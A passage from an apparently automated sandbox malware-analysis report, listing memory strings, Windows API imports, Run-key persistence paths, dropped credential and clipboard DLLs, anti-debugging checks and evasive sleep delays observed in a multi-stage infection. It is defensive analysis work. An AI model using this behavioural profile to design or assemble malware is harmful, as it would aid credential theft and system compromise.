RNEL32.DLLCREATETHREADKERNEL32.DLLCHECKREMOTEDEBUGGERPRESENTKERNEL32.DLLGETCURRENTPROCESSKERNEL32.DLLISDEBUGGERPRESENTKERNEL32.DLLEXITPROCESSKERNEL32.DLLDELETEFILEAKERNEL32.DLLPROCESS32NEXTWKERNEL32.DLLTERMINATEPROCESSKERNEL32.DLLOPENPROCESSKERNEL32.DLLPROCESS32FIRSTWKERNEL32.DLLCREATETOOLHELP32SNAPSHOTKERNEL32.DLLSETENDOFFILEKERNEL32.DLLLSTRCMPAKERNEL32.DLLWRITEPROCESSMEMORYKERNEL32.DLLREADPROCESSMEMORYKERNEL32.DLLGETFILESIZEKERNEL32.DLLWRITEFILEKERNEL32.DLLADJUSTTOKENPRIVILEGESADVAPI32.DLLOPENPROCESSTOKENADVAPI32.DLLLOOKUPPRIVILEGEVALUEWADVAPI32.DLLGETTOKENINFORMATIONADVAPI32.DLLCREATEFILEWKERNEL32.DLLSHGETFOLDERPATHWSHELL32.DLLSHGETFOLDERPATHASHELL32.DLLLSTRCATAKERNEL32.DLLSETFILEATTRIBUTESAKERNEL32.DLLSHGETKNOWNFOLDERPATHSHELL32.DLLFREELIBRARYKERNEL32.DLLMOVEFILEWKERNEL32.DLLGETFILESIZEEXKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLGETVOLUMEINFORMATIONAKERNEL32.DLLGETTICKCOUNTKERNEL32.DLLWSPRINTFWUSER32.DLLWSPRINTFAUSER32.DLLVIRTUALALLOCKERNEL32.DLLREADFILEKERNEL32.DLLSLEEPKERNEL32.DLLVIRTUALFREEKERNEL32.DLLSETFILEPOINTERKERNEL32.DLLCREATEDIRECTORYWKERNEL32.DLLFINDFIRSTFILEWKERNEL32.DLLFINDNEXTFILEWKERNEL32.DLLFINDCLOSEKERNEL32.DLLCOPYFILEWKERNEL32.DLLWRITEFILEKERNEL32.DLLGETSYSTEMDIRECTORYWKERNEL32.DLLEXITPROCESSKERNEL32.DLLCREATEREMOTETHREADKERNEL32.DLLINTERNETOPENURLWWININET.DLLINTERNETREADFILEWININET.DLLHTTPQUERYINFOAWININET.DLLINTERNETOPENWWININET.DLLINTERNETCONNECTWWININET.DLLHTTPOPENREQUESTWWININET.DLLHTTPSENDREQUESTAWININET.DLLINTERNETCLOSEHANDLEWININET.DLLPATHISURLWSHLWAPI.DLLPATHCOMBINEWSHLWAPI.DLLPATHFINDFILENAMEWSHLWAPI.DLLSTRSTRASHLWAPI.DLLURLDOWNLOADTOFILEWURLMON.DLLCREATEPROCESSWKERNEL32.DLLSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWKERNEL32.DLLGETSHORTPATHNAMEWKERNEL32.DLLGETENVIRONMENTVARIABLEWKERNEL32.DLLREGOPENKEYEXWADVAPI32.DLLREGSETVALUEEXW
                              Source: yINR7uQlPr.exe, svchost.exe, 1DC30FADAFF92643095942.exe, audiodg.exe, msiexec.exeBinary or memory string: IDAQ.EXE
                              Source: update.exe, 00000028.00000003.2629166236.0000000003470000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: HZEROX64MADE IN ALGERIA <3REFLECTIVELOADERSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNGQGWZDSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDER.EXELOADLIBRARYAKERNEL32.DLLGETPROCADDRESSKERNEL32.DLLWCSCPYMSVCRT.DLLWCSCATMSVCRT.DLLWCSCMPMSVCRT.DLLWCSNCPYMSVCRT.DLLWCSLENMSVCRT.DLLSTRLENMSVCRT.DLLREALLOCMSVCRT.DLLFREEMSVCRT.DLLWCSSTRMSVCRT.DLLGETWINDOWSDIRECTORYWKERNEL32.DLLGETVOLUMEINFORMATIONWKERNEL32.DLLLSTRCATWKERNEL32.DLLSETFILEATTRIBUTESWKERNEL32.DLLCLOSEHANDLEKERNEL32.DLLGETVERSIONEXAKERNEL32.DLLDELETEFILEWKERNEL32.DLLCREATEDIRECTORYAKERNEL32.DLLGETFILEATTRIBUTESAKERNEL32.DLLGETMODULEFILENAMEAKERNEL32.DLLCOPYFILEAKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLCREATEFILEAKERNEL32.DLLHEAPALLOCKERNEL32.DLLGETPROCESSHEAPKERNEL32.DLLEXPANDENVIRONMENTSTRINGSWKERNEL32.DLLRESUMETHREADKERNEL32.DLLSETTHREADCONTEXTKERNEL32.DLLRTLCOMPAREMEMORYKERNEL32.DLLVIRTUALALLOCEXKERNEL32.DLLGETMODULEHANDLEAKERNEL32.DLLGETTHREADCONTEXTKERNEL32.DLLGETMODULEFILENAMEWKERNEL32.DLLVIRTUALPROTECTEXKERNEL32.DLLGETLASTERRORKERNEL32.DLLRELEASEMUTEXKERNEL32.DLLCREATEMUTEXAKERNEL32.DLLHEAPFREEKERNEL32.DLLWAITFORSINGLEOBJECTKERNEL32.DLLCREATETHREADKERNEL32.DLLCHECKREMOTEDEBUGGERPRESENTKERNEL32.DLLGETCURRENTPROCESSKERNEL32.DLLISDEBUGGERPRESENTKERNEL32.DLLEXITPROCESSKERNEL32.DLLDELETEFILEAKERNEL32.DLLPROCESS32NEXTWKERNEL32.DLLTERMINATEPROCESSKERNEL32.DLLOPENPROCESSKERNEL32.DLLPROCESS32FIRSTWKERNEL32.DLLCREATETOOLHELP32SNAPSHOTKERNEL32.DLLSETENDOFFILEKERNEL32.DLLLSTRCMPAKERNEL32.DLLWRITEPROCESSMEMORYKERNEL32.DLLREADPROCESSMEMORYKERNEL32.DLLGETFILESIZEKERNEL32.DLLWRITEFILEKERNEL32.DLLADJUSTTOKENPRIVILEGESADVAPI32.DLLOPENPROCESSTOKENADVAPI32.DLLLOOKUPPRIVILEGEVALUEWADVAPI32.DLLGETTOKENINFORMATIONADVAPI32.DLLCREATEFILEWKERNEL32.DLLSHGETFOLDERPATHWSHELL32.DLLSHGETFOLDERPATHASHELL32.DLLLSTRCATAKERNEL32.DLLSETFILEATTRIBUTESAKERNEL32.DLLSHGETKNOWNFOLDERPATHSHELL32.DLLFREELIBRARYKERNEL32.DLLMOVEFILEWKERNEL32.DLLGETFILESIZEEXKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLGETVOLUMEINFORMATIONAKERNEL32.DLLGETTICKCOUNTKERNEL32.DLLWSPRINTFWUSER32.DLLWSPRINTFAUSER32.DLLVIRTUALALLOCKERNEL32.DLLREADFILEKERNEL32.DLLSLEEPKERNEL32.DLLVIRTUALFREEKERNEL32.DLLSETFILEPOINTERKERNEL32.DLLCREATEDIRECTORYWKERNEL32.DLLFINDFIRSTFILEWKERNEL32.DLLFINDNEXTFILEWKERNEL32.DLLFINDCLOSEKERNEL32.DLLCOPYFILEWKERNEL32.DLLWRITEFILEKERNEL32.DLLGETSYSTEMDIRECTORYWKERNEL32.DLLEXITPROCESSKERNEL32.DLLCREATEREMOTETHREADKERNEL32.DLLINTERNETOPENURLWWININET.DLLINTERNETREADFILEWININET.DLLHTTPQUERYINFOAWININET.DLLINTERNETOPENWWININET.DLLINTERNETCONNECTWWININET.DLLHTTPOPENREQUESTWWININET.DLLHTTPSENDREQUESTAWININET.DLLINTERNETCLOSEHANDLEWININET.DLLPATHISURLWSHLWAPI.DLLPATHCOMBINEWSHLWAPI.DLLPATHFINDFILENAMEWSHLWAPI.DLLSTRSTRASHLWAPI.DLLURLDOWNLOADTOFILEWURLMON.DLLCREATEPROCESSWKERNEL32.DLLSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWKERNEL32.DLLGETSHORTPATHNAMEWKERNEL32.DLLGETENVIRONMENTVARIABLEWKERNEL32.DLLREGOPENKEYEXWADVAPI32.DLLREGSETVALUEEX
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeMemory allocated: EB0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeMemory allocated: 28D0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeMemory allocated: 48D0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeMemory allocated: 16C0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeMemory allocated: 3430000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeMemory allocated: 1800000 memory reserve | memory write watch
                              Source: C:\Windows\explorer.exeCode function: 4_2_098288B0 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,4_2_098288B0
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeThread delayed: delay time: 180000
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeThread delayed: delay time: 180000
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\audiodg.exeWindow / User API: threadDelayed 1035Jump to behavior
                              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3155Jump to behavior
                              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 6693Jump to behavior
                              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 732Jump to behavior
                              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 735Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeWindow / User API: threadDelayed 4596Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeWindow / User API: threadDelayed 5009Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeWindow / User API: threadDelayed 1118
                              Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 901
                              Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 830
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7828
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1724
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8118
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1493
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeWindow / User API: threadDelayed 465
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\unicodedata.pydJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\select.pydJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\libcrypto-1_1.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\_bz2.pydJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\_hashlib.pydJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\_ctypes.pydJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\_socket.pydJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\python38.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71402\_lzma.pydJump to dropped file
                              Source: C:\Windows\System32\svchost.exeEvaded block: after key decisiongraph_1-848
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-1192
                              Source: C:\Windows\System32\audiodg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_8-1136
                              Source: C:\Windows\System32\msiexec.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_9-1150
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-1137
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_11-17895
                              Source: C:\Windows\System32\svchost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-1135
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeAPI coverage: 1.7 %
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeAPI coverage: 4.3 %
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeAPI coverage: 6.1 %
                              Source: C:\Windows\System32\audiodg.exe TID: 2428Thread sleep time: -50000s >= -30000sJump to behavior
                              Source: C:\Windows\System32\audiodg.exe TID: 2428Thread sleep count: 1035 > 30Jump to behavior
                              Source: C:\Windows\System32\audiodg.exe TID: 2428Thread sleep time: -51750000s >= -30000sJump to behavior
                              Source: C:\Windows\System32\audiodg.exe TID: 2576Thread sleep count: 80 > 30Jump to behavior
                              Source: C:\Windows\System32\audiodg.exe TID: 2576Thread sleep time: -216000s >= -30000sJump to behavior
                              Source: C:\Windows\System32\audiodg.exe TID: 2428Thread sleep time: -50000s >= -30000sJump to behavior
                              Source: C:\Windows\System32\msiexec.exe TID: 4368Thread sleep time: -50000s >= -30000sJump to behavior
                              Source: C:\Windows\System32\msiexec.exe TID: 4368Thread sleep count: 1026 > 30Jump to behavior
                              Source: C:\Windows\System32\msiexec.exe TID: 4368Thread sleep time: -51300000s >= -30000sJump to behavior
                              Source: C:\Windows\System32\msiexec.exe TID: 4024Thread sleep count: 75 > 30Jump to behavior
                              Source: C:\Windows\System32\msiexec.exe TID: 4024Thread sleep time: -202500s >= -30000sJump to behavior
                              Source: C:\Windows\System32\msiexec.exe TID: 4368Thread sleep time: -50000s >= -30000sJump to behavior
                              Source: C:\Windows\explorer.exe TID: 6348Thread sleep time: -2997250s >= -30000sJump to behavior
                              Source: C:\Windows\explorer.exe TID: 5548Thread sleep time: -90000s >= -30000sJump to behavior
                              Source: C:\Windows\explorer.exe TID: 6348Thread sleep time: -6358350s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe TID: 4568Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 5032Thread sleep time: -33540000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 3572Thread sleep time: -180000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 6752Thread sleep time: -180000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 5032Thread sleep time: -30000s >= -30000s
                              Source: C:\Windows\SysWOW64\rundll32.exe TID: 1776Thread sleep count: 901 > 30
                              Source: C:\Windows\SysWOW64\rundll32.exe TID: 1776Thread sleep time: -901000s >= -30000s
                              Source: C:\Windows\SysWOW64\rundll32.exe TID: 7100Thread sleep count: 830 > 30
                              Source: C:\Windows\SysWOW64\rundll32.exe TID: 7100Thread sleep time: -830000s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612Thread sleep count: 7828 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612Thread sleep count: 1724 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3812Thread sleep time: -5534023222112862s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 940Thread sleep time: -10145709240540247s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe TID: 6824Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe TID: 748Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\audiodg.exeLast function: Thread delayed
                              Source: C:\Windows\System32\audiodg.exeLast function: Thread delayed
                              Source: C:\Windows\System32\msiexec.exeLast function: Thread delayed
                              Source: C:\Windows\System32\msiexec.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF6900179B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,11_2_00007FF6900179B0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF6900185A0 FindFirstFileExW,FindClose,11_2_00007FF6900185A0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF690030B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,11_2_00007FF690030B84
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF6900185A0 FindFirstFileExW,FindClose,16_2_00007FF6900185A0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF6900179B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_00007FF6900179B0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF690030B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_00007FF690030B84
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B837303C FindFirstFileExW,FindNextFileW,FindClose,16_2_00007FF8B837303C
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B8373280 FindFirstFileExW,FindNextFileW,FindClose,16_2_00007FF8B8373280
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006CF661 FindFirstFileExW,18_2_006CF661
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007DF661 FindFirstFileExW,19_2_007DF661
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007B8430 GetTempPathA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindClose,20_2_007B8430
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007DF661 FindFirstFileExW,20_2_007DF661
